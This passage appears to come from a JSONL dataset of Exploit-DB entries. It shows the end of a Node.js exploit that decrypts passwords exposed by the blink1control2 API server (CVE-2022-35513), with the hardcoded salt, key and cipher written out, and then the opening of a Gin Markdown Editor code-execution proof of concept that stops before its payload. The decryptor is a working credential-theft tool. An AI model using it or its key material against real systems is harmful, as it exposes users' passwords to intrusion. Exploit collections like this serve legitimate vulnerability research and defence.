_\\n\\\n __| | ___ ___ _ __ _ _ _ __ | |_\\n\\\n / _` |/ _ \\\\/ __| \\'__| | | | \\'_ \\\\| __|\\n\\\n | (_| | __| (__| | | |_| | |_) | |_\\n\\\n \\\\__,_|\\\\___|\\\\___|_| \\\\__, | .__/ \\\\__|\\n\\\n |___/|_|\\033[39m';\n\n const PARSER = new ArgumentParser({\n description: 'decrypts passwords found at the /blink/input url '\n + 'of the blink1control2 api server (version <= 2.2.7 ).'\n });\n PARSER.add_argument('ciphertext', {\n help: 'encrypted password string to use', type: 'str'\n });\n let args = PARSER.parse_args();\n\n // supplied ciphertext is decrypted with same salt, password, and method\n // used for encryption:\n try {\n let crypt = simpleCrypt({\n salt: 'boopdeeboop',\n password: 'blink1control',\n method: 'aes-192-ecb'\n });\n let ciphertext = args.ciphertext;\n let decrypted = crypt.decrypt(ciphertext);\n console.log(BANNER);\n console.log('\\033[32m[+] decrypted password:\\033[39m');\n console.log(decrypted);\n }\n catch (TypeError) {\n console.log('\\033[33m[!] the submitted hash was invalid.\\033[39m');\n }\n finally {\n process.exit(1);\n }\n}\n\nexploit()", "cve_id": "CVE-2022-35513", "source": "exploitdb", "timestamp": "2022-09-20T00:00:00+00:00"} {"id": "439425d82821a0691d36", "text": "Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution\n\n# Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution\n# Date: 2023-04-24\n# Exploit Author: 8bitsec\n# CVE: CVE-2023-31873\n# Vendor Homepage: https://github.com/mariuskueng/gin\n# Software Link: https://github.com/mariuskueng/gin\n# Version: 0.7.4\n# Tested on: [Mac OS 13]\n\nRelease Date:\n\n2023-04-24\n\nProduct & Service Introduction: Javascript Markdown editor for Mac\n\nTechnical Details & Description:\nA vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file.\n\nProof of Concept (PoC):\nArbitrary code execution:\n\nCreate a markdown file (.md) in any text editor and write the following payload:\n